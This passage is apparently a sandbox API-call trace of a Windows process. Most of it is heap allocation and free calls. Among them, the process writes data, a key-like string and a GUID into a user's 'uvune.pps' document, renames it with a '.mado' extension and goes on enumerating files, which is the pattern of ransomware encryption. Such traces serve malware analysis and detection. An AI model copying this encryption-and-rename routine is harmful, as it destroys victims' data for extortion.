lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb20 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fead8 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feac0 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66a50 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.872] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xac5a, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xac5a, lpOverlapped=0x0) returned 1 [0205.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.873] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xac5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.873] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0205.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0205.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0205.873] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0205.873] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.873] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.873] CloseHandle (hObject=0x63c) returned 1 [0205.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74b68 [0205.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.874] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\uvune.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\iz56a9brq3kdvjgs8nb\\uvune.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\iZ56A9bRq3KDvJgS8nb\\uvune.pps.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\iz56a9brq3kdvjgs8nb\\uvune.pps.mado")) returned 1 [0205.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.875] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.876] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b86ee0, ftCreationTime.dwHighDateTime=0x1d5dd67, ftLastAccessTime.dwLowDateTime=0x65fc0500, ftLastAccessTime.dwHighDateTime=0x1d5dcee, ftLastWriteTime.dwLowDateTime=0x65fc0500, ftLastWriteTime.dwHighDateTime=0x1d5dcee, nFileSizeHigh=0x0, nFileSizeLow=0xac5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvune.pps", cAlternateFileName="")) returned 0 [0205.876] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0205.876] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.876] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b74b68 [0205.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b74b68 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b74b68 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b74b68 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.882] 